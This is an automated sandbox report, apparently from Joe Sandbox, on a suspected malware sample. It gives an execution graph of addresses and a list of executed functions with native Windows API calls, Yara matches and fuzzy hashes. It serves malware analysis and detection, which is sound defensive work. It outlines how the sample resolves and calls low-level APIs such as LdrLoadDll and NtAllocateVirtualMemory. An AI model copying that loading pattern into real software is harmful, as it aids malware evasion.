              execution_graph 86680 41f0c0 86683 41b970 86680->86683 86684 41b996 86683->86684 86691 409d40 86684->86691 86686 41b9a2 86687 41b9c3 86686->86687 86699 40c1c0 86686->86699 86689 41b9b5 86735 41a6b0 86689->86735 86738 409c90 86691->86738 86693 409d4d 86694 409d54 86693->86694 86750 409c30 86693->86750 86694->86686 86700 40c1e5 86699->86700 87162 40b1c0 86700->87162 86702 40c23c 87166 40ae40 86702->87166 86704 40c4b3 86704->86689 86705 40c262 86705->86704 87175 4143a0 86705->87175 86707 40c2a7 86707->86704 87178 408a60 86707->87178 86709 40c2eb 86709->86704 87185 41a500 86709->87185 86713 40c341 86714 40c348 86713->86714 87197 41a010 86713->87197 86715 41bdc0 2 API calls 86714->86715 86717 40c355 86715->86717 86717->86689 86719 40c392 86720 41bdc0 2 API calls 86719->86720 86721 40c399 86720->86721 86721->86689 86722 40c3a2 86723 40f4a0 3 API calls 86722->86723 86724 40c416 86723->86724 86724->86714 86725 40c421 86724->86725 86726 41bdc0 2 API calls 86725->86726 86727 40c445 86726->86727 87202 41a060 86727->87202 86730 41a010 2 API calls 86731 40c480 86730->86731 86731->86704 87207 419e20 86731->87207 86734 41a6b0 2 API calls 86734->86704 86736 41af60 LdrLoadDll 86735->86736 86737 41a6cf ExitProcess 86736->86737 86737->86687 86769 418bc0 86738->86769 86742 409cb6 86742->86693 86743 409cac 86743->86742 86776 41b2b0 86743->86776 86745 409cf3 86745->86742 86787 409ab0 86745->86787 86747 409d13 86793 409620 LdrLoadDll 86747->86793 86749 409d25 86749->86693 87137 41b5a0 86750->87137 86753 41b5a0 LdrLoadDll 86754 409c5b 86753->86754 86755 41b5a0 LdrLoadDll 86754->86755 86756 409c71 86755->86756 86757 40f180 86756->86757 86758 40f199 86757->86758 87145 40b040 86758->87145 86760 40f1ac 87149 41a1e0 86760->87149 86764 40f1d2 86767 40f1fd 86764->86767 87155 41a260 86764->87155 86766 41a490 2 API calls 86768 409d65 86766->86768 86767->86766 86768->86686 86770 418bcf 86769->86770 86794 414e50 86770->86794 86772 409ca3 86773 418a70 86772->86773 86800 41a600 86773->86800 86777 41b2c9 86776->86777 86808 414a50 86777->86808 86779 41b2e1 86780 41b2ea 86779->86780 86847 41b0f0 86779->86847 86780->86745 86782 41b2fe 86782->86780 86865 419f00 86782->86865 86790 409aca 86787->86790 87115 407ea0 86787->87115 86789 409ad1 86789->86747 86790->86789 87128 408160 86790->87128 86793->86749 86795 414e6a 86794->86795 86796 414e5e 86794->86796 86795->86772 86796->86795 86799 4152d0 LdrLoadDll 86796->86799 86798 414fbc 86798->86772 86799->86798 86801 41a616 86800->86801 86804 41af60 86801->86804 86803 418a85 86803->86743 86805 41af70 86804->86805 86807 41af92 86804->86807 86806 414e50 LdrLoadDll 86805->86806 86806->86807 86807->86803 86809 414d85 86808->86809 86811 414a64 86808->86811 86809->86779 86811->86809 86873 419c50 86811->86873 86813 414b90 86876 41a360 86813->86876 86814 414b73 86933 41a460 LdrLoadDll 86814->86933 86817 414bb7 86819 41bdc0 2 API calls 86817->86819 86818 414b7d 86818->86779 86822 414bc3 86819->86822 86820 414d49 86821 41a490 2 API calls 86820->86821 86824 414d50 86821->86824 86822->86818 86822->86820 86823 414d5f 86822->86823 86827 414c52 86822->86827 86942 414790 LdrLoadDll NtReadFile NtClose 86823->86942 86824->86779 86826 414d72 86826->86779 86828 414cb9 86827->86828 86830 414c61 86827->86830 86828->86820 86829 414ccc 86828->86829 86935 41a2e0 86829->86935 86832 414c66 86830->86832 86833 414c7a 86830->86833 86934 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 86832->86934 86836 414c97 86833->86836 86837 414c7f 86833->86837 86836->86824 86891 414410 86836->86891 86879 4146f0 86837->86879 86840 414c70 86840->86779 86841 414c8d 86841->86779 86843 414d2c 86939 41a490 86843->86939 86844 414caf 86844->86779 86846 414d38 86846->86779 86848 41b101 86847->86848 86849 41b113 86848->86849 86960 41bd40 86848->86960 86849->86782 86851 41b134 86963 414070 86851->86963 86853 41b180 86853->86782 86854 41b157 86854->86853 86855 414070 3 API calls 86854->86855 86857 41b179 86855->86857 86857->86853 86988 415390 86857->86988 86858 41b20a 86859 41b21a 86858->86859 87082 41af00 LdrLoadDll 86858->87082 86998 41ad70 86859->86998 86862 41b248 87077 419ec0 86862->87077 86866 419f1c 86865->86866 86867 41af60 LdrLoadDll 86865->86867 87109 13f2c0a 86866->87109 86867->86866 86868 419f37 86870 41bdc0 86868->86870 87112 41a670 86870->87112 86872 41b359 86872->86745 86874 414b44 86873->86874 86875 41af60 LdrLoadDll 86873->86875 86874->86813 86874->86814 86874->86818 86875->86874 86877 41a37c NtCreateFile 86876->86877 86878 41af60 LdrLoadDll 86876->86878 86877->86817 86878->86877 86880 41470c 86879->86880 86881 41a2e0 LdrLoadDll 86880->86881 86882 41472d 86881->86882 86883 414734 86882->86883 86884 414748 86882->86884 86885 41a490 2 API calls 86883->86885 86886 41a490 2 API calls 86884->86886 86887 41473d 86885->86887 86888 414751 86886->86888 86887->86841 86943 41bfd0 LdrLoadDll RtlAllocateHeap 86888->86943 86890 41475c 86890->86841 86892 41445b 86891->86892 86893 41448e 86891->86893 86894 41a2e0 LdrLoadDll 86892->86894 86895 4145d9 86893->86895 86899 4144aa 86893->86899 86896 414476 86894->86896 86897 41a2e0 LdrLoadDll 86895->86897 86898 41a490 2 API calls 86896->86898 86903 4145f4 86897->86903 86900 41447f 86898->86900 86901 41a2e0 LdrLoadDll 86899->86901 86900->86844 86902 4144c5 86901->86902 86905 4144e1 86902->86905 86906 4144cc 86902->86906 86956 41a320 LdrLoadDll 86903->86956 86909 4144e6 86905->86909 86910 4144fc 86905->86910 86908 41a490 2 API calls 86906->86908 86907 41462e 86911 41a490 2 API calls 86907->86911 86912 4144d5 86908->86912 86913 41a490 2 API calls 86909->86913 86918 414501 86910->86918 86944 41bf90 86910->86944 86914 414639 86911->86914 86912->86844 86915 4144ef 86913->86915 86914->86844 86915->86844 86926 414513 86918->86926 86947 41a410 86918->86947 86919 414567 86920 41457e 86919->86920 86955 41a2a0 LdrLoadDll 86919->86955 86922 414585 86920->86922 86923 41459a 86920->86923 86924 41a490 2 API calls 86922->86924 86925 41a490 2 API calls 86923->86925 86924->86926 86927 4145a3 86925->86927 86926->86844 86928 4145cf 86927->86928 86950 41bb90 86927->86950 86928->86844 86930 4145ba 86931 41bdc0 2 API calls 86930->86931 86932 4145c3 86931->86932 86932->86844 86933->86818 86934->86840 86936 41af60 LdrLoadDll 86935->86936 86937 414d14 86936->86937 86938 41a320 LdrLoadDll 86937->86938 86938->86843 86940 41a4ac NtClose 86939->86940 86941 41af60 LdrLoadDll 86939->86941 86940->86846 86941->86940 86942->86826 86943->86890 86957 41a630 86944->86957 86946 41bfa8 86946->86918 86948 41a42c NtReadFile 86947->86948 86949 41af60 LdrLoadDll 86947->86949 86948->86919 86949->86948 86951 41bbb4 86950->86951 86952 41bb9d 86950->86952 86951->86930 86952->86951 86953 41bf90 2 API calls 86952->86953 86954 41bbcb 86953->86954 86954->86930 86955->86920 86956->86907 86958 41af60 LdrLoadDll 86957->86958 86959 41a64c RtlAllocateHeap 86958->86959 86959->86946 87083 41a540 86960->87083 86962 41bd6d 86962->86851 86964 414081 86963->86964 86966 414089 86963->86966 86964->86854 86965 41435c 86965->86854 86966->86965 87086 41cf30 86966->87086 86968 4140dd 86969 41cf30 2 API calls 86968->86969 86972 4140e8 86969->86972 86970 414136 86973 41cf30 2 API calls 86970->86973 86972->86970 87091 41cfd0 86972->87091 86974 41414a 86973->86974 86975 41cf30 2 API calls 86974->86975 86977 4141bd 86975->86977 86976 41cf30 2 API calls 86984 414205 86976->86984 86977->86976 86979 414334 87098 41cf90 LdrLoadDll RtlFreeHeap 86979->87098 86981 41433e 87099 41cf90 LdrLoadDll RtlFreeHeap 86981->87099 86983 414348 87100 41cf90 LdrLoadDll RtlFreeHeap 86983->87100 87097 41cf90 LdrLoadDll RtlFreeHeap 86984->87097 86986 414352 87101 41cf90 LdrLoadDll RtlFreeHeap 86986->87101 86989 4153a1 86988->86989 86990 414a50 8 API calls 86989->86990 86991 4153b7 86990->86991 86992 4153f2 86991->86992 86993 415405 86991->86993 86997 41540a 86991->86997 86994 41bdc0 2 API calls 86992->86994 86995 41bdc0 2 API calls 86993->86995 86996 4153f7 86994->86996 86995->86997 86996->86858 86997->86858 87102 41ac30 86998->87102 87001 41ac30 LdrLoadDll 87002 41ad8d 87001->87002 87003 41ac30 LdrLoadDll 87002->87003 87004 41ad96 87003->87004 87005 41ac30 LdrLoadDll 87004->87005 87006 41ad9f 87005->87006 87007 41ac30 LdrLoadDll 87006->87007 87008 41ada8 87007->87008 87009 41ac30 LdrLoadDll 87008->87009 87010 41adb1 87009->87010 87011 41ac30 LdrLoadDll 87010->87011 87012 41adbd 87011->87012 87013 41ac30 LdrLoadDll 87012->87013 87014 41adc6 87013->87014 87015 41ac30 LdrLoadDll 87014->87015 87016 41adcf 87015->87016 87017 41ac30 LdrLoadDll 87016->87017 87018 41add8 87017->87018 87019 41ac30 LdrLoadDll 87018->87019 87020 41ade1 87019->87020 87021 41ac30 LdrLoadDll 87020->87021 87022 41adea 87021->87022 87023 41ac30 LdrLoadDll 87022->87023 87024 41adf6 87023->87024 87025 41ac30 LdrLoadDll 87024->87025 87026 41adff 87025->87026 87027 41ac30 LdrLoadDll 87026->87027 87028 41ae08 87027->87028 87029 41ac30 LdrLoadDll 87028->87029 87030 41ae11 87029->87030 87031 41ac30 LdrLoadDll 87030->87031 87032 41ae1a 87031->87032 87033 41ac30 LdrLoadDll 87032->87033 87034 41ae23 87033->87034 87035 41ac30 LdrLoadDll 87034->87035 87036 41ae2f 87035->87036 87037 41ac30 LdrLoadDll 87036->87037 87038 41ae38 87037->87038 87039 41ac30 LdrLoadDll 87038->87039 87040 41ae41 87039->87040 87041 41ac30 LdrLoadDll 87040->87041 87042 41ae4a 87041->87042 87043 41ac30 LdrLoadDll 87042->87043 87044 41ae53 87043->87044 87045 41ac30 LdrLoadDll 87044->87045 87046 41ae5c 87045->87046 87047 41ac30 LdrLoadDll 87046->87047 87048 41ae68 87047->87048 87049 41ac30 LdrLoadDll 87048->87049 87050 41ae71 87049->87050 87051 41ac30 LdrLoadDll 87050->87051 87052 41ae7a 87051->87052 87053 41ac30 LdrLoadDll 87052->87053 87054 41ae83 87053->87054 87055 41ac30 LdrLoadDll 87054->87055 87056 41ae8c 87055->87056 87057 41ac30 LdrLoadDll 87056->87057 87058 41ae95 87057->87058 87059 41ac30 LdrLoadDll 87058->87059 87060 41aea1 87059->87060 87061 41ac30 LdrLoadDll 87060->87061 87062 41aeaa 87061->87062 87063 41ac30 LdrLoadDll 87062->87063 87064 41aeb3 87063->87064 87065 41ac30 LdrLoadDll 87064->87065 87066 41aebc 87065->87066 87067 41ac30 LdrLoadDll 87066->87067 87068 41aec5 87067->87068 87069 41ac30 LdrLoadDll 87068->87069 87070 41aece 87069->87070 87071 41ac30 LdrLoadDll 87070->87071 87072 41aeda 87071->87072 87073 41ac30 LdrLoadDll 87072->87073 87074 41aee3 87073->87074 87075 41ac30 LdrLoadDll 87074->87075 87076 41aeec 87075->87076 87076->86862 87078 41af60 LdrLoadDll 87077->87078 87079 419edc 87078->87079 87108 13f2df0 LdrInitializeThunk 87079->87108 87080 419ef3 87080->86782 87082->86859 87084 41af60 LdrLoadDll 87083->87084 87085 41a55c NtAllocateVirtualMemory 87084->87085 87085->86962 87087 41cf40 87086->87087 87088 41cf46 87086->87088 87087->86968 87089 41bf90 2 API calls 87088->87089 87090 41cf6c 87089->87090 87090->86968 87092 41cff5 87091->87092 87095 41d02d 87091->87095 87093 41bf90 2 API calls 87092->87093 87094 41d00a 87093->87094 87096 41bdc0 2 API calls 87094->87096 87095->86972 87096->87095 87097->86979 87098->86981 87099->86983 87100->86986 87101->86965 87103 41ac4b 87102->87103 87104 414e50 LdrLoadDll 87103->87104 87105 41ac6b 87104->87105 87106 414e50 LdrLoadDll 87105->87106 87107 41ad17 87105->87107 87106->87107 87107->87001 87108->87080 87110 13f2c1f LdrInitializeThunk 87109->87110 87111 13f2c11 87109->87111 87110->86868 87111->86868 87113 41a68c RtlFreeHeap 87112->87113 87114 41af60 LdrLoadDll 87112->87114 87113->86872 87114->87113 87116 407eb0 87115->87116 87117 407eab 87115->87117 87118 41bd40 2 API calls 87116->87118 87117->86790 87124 407ed5 87118->87124 87119 407f38 87119->86790 87120 419ec0 2 API calls 87120->87124 87121 407f3e 87123 407f64 87121->87123 87125 41a5c0 2 API calls 87121->87125 87123->86790 87124->87119 87124->87120 87124->87121 87126 41bd40 2 API calls 87124->87126 87131 41a5c0 87124->87131 87127 407f55 87125->87127 87126->87124 87127->86790 87129 41a5c0 2 API calls 87128->87129 87130 40817e 87129->87130 87130->86747 87132 41af60 LdrLoadDll 87131->87132 87133 41a5dc 87132->87133 87136 13f2c70 LdrInitializeThunk 87133->87136 87134 41a5f3 87134->87124 87136->87134 87138 41b5c3 87137->87138 87141 40acf0 87138->87141 87142 40ad14 87141->87142 87143 40ad50 LdrLoadDll 87142->87143 87144 409c4a 87142->87144 87143->87144 87144->86753 87146 40b063 87145->87146 87148 40b0e0 87146->87148 87160 419c90 LdrLoadDll 87146->87160 87148->86760 87150 41af60 LdrLoadDll 87149->87150 87151 40f1bb 87150->87151 87151->86768 87152 41a7d0 87151->87152 87153 41a7ef LookupPrivilegeValueW 87152->87153 87154 41af60 LdrLoadDll 87152->87154 87153->86764 87154->87153 87156 41a27c 87155->87156 87157 41af60 LdrLoadDll 87155->87157 87161 13f2ea0 LdrInitializeThunk 87156->87161 87157->87156 87158 41a29b 87158->86767 87160->87148 87161->87158 87163 40b1f0 87162->87163 87164 40b040 LdrLoadDll 87163->87164 87165 40b204 87164->87165 87165->86702 87167 40ae51 87166->87167 87168 40ae4d 87166->87168 87169 40ae6a 87167->87169 87170 40ae9c 87167->87170 87168->86705 87212 419cd0 LdrLoadDll 87169->87212 87213 419cd0 LdrLoadDll 87170->87213 87172 40aead 87172->86705 87174 40ae8c 87174->86705 87176 40f4a0 3 API calls 87175->87176 87177 4143c6 87175->87177 87176->87177 87177->86707 87179 408a79 87178->87179 87214 4087a0 87178->87214 87181 4087a0 19 API calls 87179->87181 87184 408a9d 87179->87184 87182 408a8a 87181->87182 87182->87184 87232 40f710 10 API calls 87182->87232 87184->86709 87186 41af60 LdrLoadDll 87185->87186 87187 41a51c 87186->87187 87351 13f2e80 LdrInitializeThunk 87187->87351 87188 40c322 87190 40f4a0 87188->87190 87191 40f4bd 87190->87191 87352 419fc0 87191->87352 87194 40f505 87194->86713 87195 41a010 2 API calls 87196 40f52e 87195->87196 87196->86713 87198 41a02c 87197->87198 87199 41af60 LdrLoadDll 87197->87199 87358 13f2d10 LdrInitializeThunk 87198->87358 87199->87198 87200 40c385 87200->86719 87200->86722 87203 41af60 LdrLoadDll 87202->87203 87204 41a07c 87203->87204 87359 13f2d30 LdrInitializeThunk 87204->87359 87205 40c459 87205->86730 87208 41af60 LdrLoadDll 87207->87208 87209 419e3c 87208->87209 87360 13f2fb0 LdrInitializeThunk 87209->87360 87210 40c4ac 87210->86734 87212->87174 87213->87172 87215 407ea0 4 API calls 87214->87215 87230 4087ba 87215->87230 87216 408a3f 87217 408160 2 API calls 87216->87217 87218 408a49 87217->87218 87218->87179 87221 419f00 2 API calls 87221->87230 87223 41a490 LdrLoadDll NtClose 87223->87230 87226 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 87226->87230 87229 419e20 2 API calls 87229->87230 87230->87216 87230->87218 87230->87221 87230->87223 87230->87226 87230->87229 87233 419d10 87230->87233 87236 4085d0 87230->87236 87248 40f5f0 LdrLoadDll NtClose 87230->87248 87249 419d90 LdrLoadDll 87230->87249 87250 419dc0 LdrLoadDll 87230->87250 87251 419e50 LdrLoadDll 87230->87251 87252 4083a0 87230->87252 87268 405f60 LdrLoadDll 87230->87268 87232->87184 87234 41af60 LdrLoadDll 87233->87234 87235 419d2c 87234->87235 87235->87230 87237 4085e6 87236->87237 87269 419880 87237->87269 87239 4085ff 87244 408771 87239->87244 87290 4081a0 87239->87290 87241 4086e5 87242 4083a0 11 API calls 87241->87242 87241->87244 87243 408713 87242->87243 87243->87244 87245 419f00 2 API calls 87243->87245 87244->87230 87246 408748 87245->87246 87246->87244 87247 41a500 2 API calls 87246->87247 87247->87244 87248->87230 87249->87230 87250->87230 87251->87230 87253 4083c9 87252->87253 87330 408310 87253->87330 87255 4083dc 87257 41a500 2 API calls 87255->87257 87258 408467 87255->87258 87261 408462 87255->87261 87338 40f670 87255->87338 87257->87255 87258->87230 87259 41a490 2 API calls 87260 40849a 87259->87260 87260->87258 87262 419d10 LdrLoadDll 87260->87262 87261->87259 87263 4084ff 87262->87263 87263->87258 87342 419d50 87263->87342 87265 408563 87265->87258 87266 414a50 8 API calls 87265->87266 87267 4085b8 87266->87267 87267->87230 87268->87230 87270 41bf90 2 API calls 87269->87270 87271 419897 87270->87271 87297 409310 87271->87297 87273 4198b2 87274 4198f0 87273->87274 87275 4198d9 87273->87275 87277 41bd40 2 API calls 87274->87277 87276 41bdc0 2 API calls 87275->87276 87278 4198e6 87276->87278 87279 41992a 87277->87279 87278->87239 87280 41bd40 2 API calls 87279->87280 87281 419943 87280->87281 87287 419be4 87281->87287 87303 41bd80 87281->87303 87284 419bd0 87285 41bdc0 2 API calls 87284->87285 87286 419bda 87285->87286 87286->87239 87288 41bdc0 2 API calls 87287->87288 87289 419c39 87288->87289 87289->87239 87292 4081a1 87290->87292 87291 40829f 87291->87241 87292->87291 87293 414a50 8 API calls 87292->87293 87295 408222 87293->87295 87294 408249 87294->87241 87295->87294 87296 41bdc0 2 API calls 87295->87296 87296->87294 87298 409335 87297->87298 87299 40acf0 LdrLoadDll 87298->87299 87300 409368 87299->87300 87302 40938d 87300->87302 87306 40cf20 87300->87306 87302->87273 87324 41a580 87303->87324 87307 40cf4c 87306->87307 87308 41a1e0 LdrLoadDll 87307->87308 87309 40cf65 87308->87309 87310 40cf6c 87309->87310 87317 41a220 87309->87317 87310->87302 87314 40cfa7 87315 41a490 2 API calls 87314->87315 87316 40cfca 87315->87316 87316->87302 87318 41a23c 87317->87318 87319 41af60 LdrLoadDll 87317->87319 87323 13f2ca0 LdrInitializeThunk 87318->87323 87319->87318 87320 40cf8f 87320->87310 87322 41a810 LdrLoadDll 87320->87322 87322->87314 87323->87320 87325 41a59c 87324->87325 87326 41af60 LdrLoadDll 87324->87326 87329 13f2f90 LdrInitializeThunk 87325->87329 87326->87325 87327 419bc9 87327->87284 87327->87287 87329->87327 87331 408328 87330->87331 87332 40acf0 LdrLoadDll 87331->87332 87333 408343 87332->87333 87334 414e50 LdrLoadDll 87333->87334 87335 408353 87334->87335 87336 40835c PostThreadMessageW 87335->87336 87337 408370 87335->87337 87336->87337 87337->87255 87339 40f683 87338->87339 87345 419e90 87339->87345 87343 41af60 LdrLoadDll 87342->87343 87344 419d6c 87343->87344 87344->87265 87346 41af60 LdrLoadDll 87345->87346 87347 419eac 87346->87347 87350 13f2dd0 LdrInitializeThunk 87347->87350 87348 40f6ae 87348->87255 87350->87348 87351->87188 87353 41af60 LdrLoadDll 87352->87353 87354 419fdc 87353->87354 87357 13f2f30 LdrInitializeThunk 87354->87357 87355 40f4fe 87355->87194 87355->87195 87357->87355 87358->87200 87359->87205 87360->87210 87364 13f2ad0 LdrInitializeThunk

              Executed Functions

              Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
              APIs
              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA$rMA$rMA
              • API String ID: 2738559852-782607585
              • Opcode ID: da9dca5e340969b0e19fdfb2769eff91311bbc90f038b01d9c4a8653d3c13b5c
              • Instruction ID: d9f3efcc6fba735fe827f6fd57d323a72c1d16cfd7affead5f3e42ca52de0d7b
              • Opcode Fuzzy Hash: da9dca5e340969b0e19fdfb2769eff91311bbc90f038b01d9c4a8653d3c13b5c
              • Instruction Fuzzy Hash: 81F0A9B2200208AFCB14DF99DC81DEB77A9EF8C754F158249BA1DA7241D634E951CBE4
              Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
              APIs
              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA$rMA$rMA
              • API String ID: 2738559852-782607585
              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
              Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 234 40acf0-40ad0c 235 40ad14-40ad19 234->235 236 40ad0f call 41cc50 234->236 237 40ad1b-40ad1e 235->237 238 40ad1f-40ad2d call 41d070 235->238 236->235 241 40ad3d-40ad4e call 41b4a0 238->241 242 40ad2f-40ad3a call 41d2f0 238->242 247 40ad50-40ad64 LdrLoadDll 241->247 248 40ad67-40ad6a 241->248 242->241 247->248
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
              Function 0041A35F Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 249 41a35f-41a3b1 call 41af60 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 4049a3bf42b563136c493a9652f10bd73eeb14a36f32a88b936d0f677cb3cfab
              • Instruction ID: b0ea305ca0179594be26f88849999d72c403b9e7c25092e2012cfb502ab0554f
              • Opcode Fuzzy Hash: 4049a3bf42b563136c493a9652f10bd73eeb14a36f32a88b936d0f677cb3cfab
              • Instruction Fuzzy Hash: FEF0BDB2205208AFCB48CF88DC85EEB37EDAF8C754F158248BA0DD7241D630E8518BA4
              Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 252 41a360-41a376 253 41a37c-41a3b1 NtCreateFile 252->253 254 41a377 call 41af60 252->254 254->253
              APIs
              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
              Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 255 41a53a-41a556 256 41a55c-41a57d NtAllocateVirtualMemory 255->256 257 41a557 call 41af60 255->257 257->256
              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 5c48dbb4db2addaba0cea100d782742fbf10658976ab14c12c095cf639fd573d
              • Instruction ID: 82a71e247ab1e51189810cadd825386097fb7f7a34c392186ae9d553c9c6a0ab
              • Opcode Fuzzy Hash: 5c48dbb4db2addaba0cea100d782742fbf10658976ab14c12c095cf639fd573d
              • Instruction Fuzzy Hash: 5EF058B2200208AFDB14DF99CC81EEB77B9EF88354F158558FE4DA7241C630E821CBA0
              Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 258 41a540-41a57d call 41af60 NtAllocateVirtualMemory
              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
              Function 0041A48A Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: cd4cd9b3938568fcee11681b6c846c76ac88f6db5cd9fb966552161bd42c3cf2
              • Instruction ID: eea82b31076ec0d138028a2a42476fb395de81841b37d259ef3cf74a12bfe863
              • Opcode Fuzzy Hash: cd4cd9b3938568fcee11681b6c846c76ac88f6db5cd9fb966552161bd42c3cf2
              • Instruction Fuzzy Hash: 93E086712001147FD711DFA8DC45EE73B6CEF88730F244559B91D97291D130E6118790
              Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
              Download Yara Rule
              APIs
